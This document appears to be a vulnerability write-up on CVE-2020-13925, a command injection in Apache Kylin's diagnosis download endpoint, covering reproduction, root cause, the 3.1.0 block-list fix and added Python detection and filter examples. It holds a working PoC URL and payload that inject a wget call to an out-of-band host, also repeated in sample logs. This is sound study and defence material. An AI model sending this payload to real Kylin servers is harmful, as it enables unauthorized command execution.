CVE-2020-13925 Apache Kylin command injection vulnerability


Vulnerability overview

Summary

Apache Kylin is an open-source distributed analytical data warehouse (OLAP engine) for big data.

Affected versions

  • 2.3.0, 2.3.1, 2.3.2,
  • 2.4.0, 2.4.1,
  • 2.5.0, 2.5.1, 2.5.2,
  • 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6,
  • 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2

Users of all previous versions after 2.3 should upgrade to 3.1.0, i.e. the fixed version is 3.1.0.

Exploitation requirements

  • An account that can log in to the web UI. The default username and password are ADMIN/KYLIN.

Reproduction

Environment setup

Following https://github.com/apache/kylin, deploy the environment with docker, changing the image version to 3.0.1 (a vulnerable version). The line "-m 8G \" can be dropped; it only sets the container's memory limit.

Then open http://host:7070/kylin/login and log in with the default username and password ADMIN/KYLIN.

docker pull apachekylin/apache-kylin-standalone:3.0.1

docker run -d \
    -m 8G \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1

# The same command without the memory limit:
docker run -d \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1

PoC

Original request:
http://120.76.179.151:7070/kylin/api/diag/project/learn_kylin/download

PoC request (GET):
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download

That is, replace the project name "learn_kylin" with the following payload and request the URL:
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||

Reproduction steps

Go to System > Configuration > Diagnosis and trigger the diagnostic-information download request http://host:port/kylin/api/diag/project/learn_kylin/download, then replace the project name "learn_kylin" in that request with the payload above. The project name is the only attacker-controlled part of the request; everything else is what the UI sends.

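For the detection side, the following added example (not from the original page or the Kylin project) scans web-server access-log lines for requests to the diag download endpoint whose URL-decoded project segment contains shell metacharacters, which is exactly what the PoC request above looks like in a log. The combined access-log format and the four sample lines are constructed for illustration; the second line carries the page's payload verbatim.

```python
"""Detect CVE-2020-13925 exploitation attempts in Apache Kylin access logs.

Added example, not part of the original page or the Kylin project. The log
format is assumed to be the Apache/Tomcat combined access-log format; the
sample lines in SAMPLE_LOG are constructed for illustration.
"""
import re
from urllib.parse import unquote, urlsplit

# The vulnerable endpoint: the path segment after /project/ is the project
# name that Kylin 3.0.x concatenates into a shell command line.
DIAG_PATH_RE = re.compile(r"^/kylin/api/diag/project/(?P<project>[^/]+)/download$")

# Request line inside a combined access-log entry, e.g. "GET /path HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# A legitimate project name never needs these; any of them in the decoded
# segment means the request is trying to break out of the command line.
SHELL_META = set(" \t\n\r|&;$`<>(){}\\'\"")


def extract_project(target):
    """Return the URL-decoded project segment of a diag download request, or None."""
    path = urlsplit(target).path          # drops any ?query=, keeps percent-encoding
    m = DIAG_PATH_RE.match(path)
    if m is None:
        return None
    return unquote(m.group("project"))    # %7c%7cwget%20... -> ||wget ...


def is_suspicious(project):
    """True if the decoded project name contains shell metacharacters."""
    return any(ch in SHELL_META for ch in project)


def scan_access_log(lines):
    """Return (line_number, decoded_project) for every suspicious diag request."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        project = extract_project(m.group("target"))
        if project is not None and is_suspicious(project):
            hits.append((lineno, project))
    return hits


# Constructed sample log: line 1 is a normal diagnosis download, line 2 is the
# page's PoC request, line 3 is unrelated, line 4 uses && instead of ||.
SAMPLE_LOG = [
    '10.0.0.5 - ADMIN [10/Jul/2020:12:00:00 +0000] "GET /kylin/api/diag/project/learn_kylin/download HTTP/1.1" 200 5120',
    '10.0.0.9 - ADMIN [10/Jul/2020:12:01:13 +0000] "GET /kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download HTTP/1.1" 200 213',
    '10.0.0.5 - ADMIN [10/Jul/2020:12:02:40 +0000] "GET /kylin/api/projects HTTP/1.1" 200 880',
    '10.0.0.9 - ADMIN [10/Jul/2020:12:03:02 +0000] "GET /kylin/api/diag/project/a%26%26id/download HTTP/1.1" 200 213',
]

if __name__ == "__main__":
    for lineno, project in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: suspicious project segment {project!r}")
```

Matching is done on the raw path and decoding only on the captured segment, so percent-encoded separators are caught without letting an encoded slash confuse the route match. The metacharacter set is deliberately broader than the two operators in the PoC.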

Vulnerability analysis

Locating the vulnerable code

https://github.com/apache/kylin/tree/kylin-3.0.2/server-base

Vulnerable code locations:

  • https://github.com/apache/kylin/blob/kylin-3.0.2/server-base/src/main/java/org/apache/kylin/rest/controller/DiagnosisController.java
  • https://github.com/apache/kylin/blob/kylin-3.0.2/server-base/src/main/java/org/apache/kylin/rest/service/DiagnosisService.java
  • https://github.com/apache/kylin/blob/kylin-3.0.2/core-common/src/main/java/org/apache/kylin/common/util/CliCommandExecutor.java

The project name is read from the URL path variable in DiagnosisController and handed to DiagnosisService, which concatenates it into the command line for the diagnosis script; CliCommandExecutor then runs that string through a shell. Nothing on the way validates the project name, so the shell operators in the payload (||) terminate the intended command and start a new one.

Fix

Comparing the 3.0.2 and 3.1.0 code of src/main/java/org/apache/kylin/rest/controller/DiagnosisController.java: in 3.1.0 the controller runs the project name through a filter before using it.

The filter lives in CliCommandExecutor.java (core-common/src/main/java/org/apache/kylin/common/util/) in the 3.1.0 source and takes a block-list approach:

    public static final String COMMAND_BLOCK_LIST = "[ &`>|{}()$;\\#~!+*\\\\]+";
    public static final String COMMAND_WHITE_LIST = "[^\\w%,@/:=?.\"\\[\\]]";
    public static final String HIVE_BLOCK_LIST = "[ <>()$;\\-#!+*\"'/=%@]+";


    /**
     * <pre>
     * Check parameter for preventing command injection, replace illegal character into empty character.
     *
     * Note:
     * 1. Whitespace is also refused because parameter is a single word, should not contains it
     * 2. Some character may be illegal but still be accepted because commandParameter maybe a URI/path expression,
     *     you may check "Character part" in https://docs.oracle.com/javase/8/docs/api/java/net/URI.html,
     *     here is the character which is not banned.
     *
     *     1. dot .
     *     2. slash /
     *     3. colon :
     *     4. equal =
     *     5. ?
     *     6. @
     *     7. bracket []
     *     8. comma ,
     *     9. %
     * </pre>
     */
    public static String checkParameter(String commandParameter) {
        return checkParameter(commandParameter, COMMAND_BLOCK_LIST);
    }

    public static String checkParameterWhiteList(String commandParameter) {
        return checkParameter(commandParameter, COMMAND_WHITE_LIST);
    }

    public static String checkHiveProperty(String hiveProperty) {
        return checkParameter(hiveProperty, HIVE_BLOCK_LIST);
    }

    private static String checkParameter(String commandParameter, String rex) {
        String repaired = commandParameter.replaceAll(rex, "");
        if (repaired.length() != commandParameter.length()) {
            logger.warn("Detected illegal character in command {} by {} , replace it to {}.", commandParameter, rex, repaired);
        }
        return repaired;
    }

The common command-injection separators || and && are filtered, and even the space character is stripped, so no way around the filter was found. Two points worth noting about this fix: the filter repairs the value instead of rejecting it (a warning is logged and the stripped string is used as if nothing happened), and block-listing characters in a string that is still handed to a shell is inherently brittle. The more robust options are an allow-list for the project name (letters, digits and underscore) and passing the name to the diagnosis script as a separate argument vector element rather than through a shell command line.
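To see what the 3.1.0 filter actually does to the PoC payload, and how an allow-list behaves differently, here is an added example (not code from the Kylin project). The three regexes are the Java string literals from CliCommandExecutor.java above transcribed as Python raw strings, and checkParameter's replace-and-warn behaviour is reproduced; PROJECT_NAME_RE is an assumption about what a project name legitimately needs, not a rule taken from Kylin.

```python
"""Kylin 3.1.0 CliCommandExecutor parameter filter ported to Python, beside an allow-list check.

Added example, not code from the Apache Kylin project. The regexes are the
Java literals from CliCommandExecutor.java (3.1.0); PROJECT_NAME_RE is an
assumption about what a project name needs, not a rule taken from Kylin.
"""
import re

# Java "[ &`>|{}()$;\\#~!+*\\\\]+": space plus the usual shell metacharacters
COMMAND_BLOCK_LIST = r"[ &`>|{}()$;\#~!+*\\]+"
# Java "[^\\w%,@/:=?.\"\\[\\]]": a negated class, i.e. strip everything NOT listed
COMMAND_WHITE_LIST = r'[^\w%,@/:=?."\[\]]'
# Java "[ <>()$;\\-#!+*\"'/=%@]+"
HIVE_BLOCK_LIST = r"""[ <>()$;\-#!+*"'/=%@]+"""

# The page's PoC payload, used as the sample input below.
PAYLOAD = "||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||"


def _check(parameter, regex):
    """Mirror of the private checkParameter(String, String): strip matches, return the rest.

    re.ASCII makes Python's \\w match Java's default ASCII-only \\w.
    """
    repaired = re.sub(regex, "", parameter, flags=re.ASCII)
    if len(repaired) != len(parameter):
        # Kylin logs a warning here but still returns the repaired value
        print(f"WARN illegal character in {parameter!r} by {regex}, replaced to {repaired!r}")
    return repaired


def check_parameter(parameter):
    """Port of CliCommandExecutor.checkParameter (block-list mode)."""
    return _check(parameter, COMMAND_BLOCK_LIST)


def check_parameter_white_list(parameter):
    """Port of CliCommandExecutor.checkParameterWhiteList."""
    return _check(parameter, COMMAND_WHITE_LIST)


def check_hive_property(hive_property):
    """Port of CliCommandExecutor.checkHiveProperty."""
    return _check(hive_property, HIVE_BLOCK_LIST)


# Allow-list alternative (assumption: letters, digits and underscore are all a
# project name needs). Reject the request instead of silently rewriting the value.
PROJECT_NAME_RE = re.compile(r"[A-Za-z0-9_]+")


def validate_project_name(name):
    """Return name unchanged if it is a plain identifier, else raise ValueError."""
    if not PROJECT_NAME_RE.fullmatch(name):
        raise ValueError(f"rejected project name: {name!r}")
    return name


if __name__ == "__main__":
    for name in ("learn_kylin", PAYLOAD):
        print(f"{name!r}\n  block list  -> {check_parameter(name)!r}")
        try:
            validate_project_name(name)
            print("  allow list  -> accepted")
        except ValueError as e:
            print(f"  allow list  -> {e}")
    # A property of the pattern itself: the space character is stripped, other
    # whitespace is not. This says nothing about whether the endpoint is still injectable.
    print(repr(check_parameter("a\tb")))
```

Running it shows the block list turning the payload into a harmless-looking `wgeth1j96...burpcollaborator.net` that is then used as the project name, while the allow-list check raises and the request can be refused with a clear error. The last line illustrates why a block list needs to be read character by character: the class covers the space but not tab or newline.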

References

https://mp.weixin.qq.com/s/LdEgENX2_b8tb12n4H9KJQ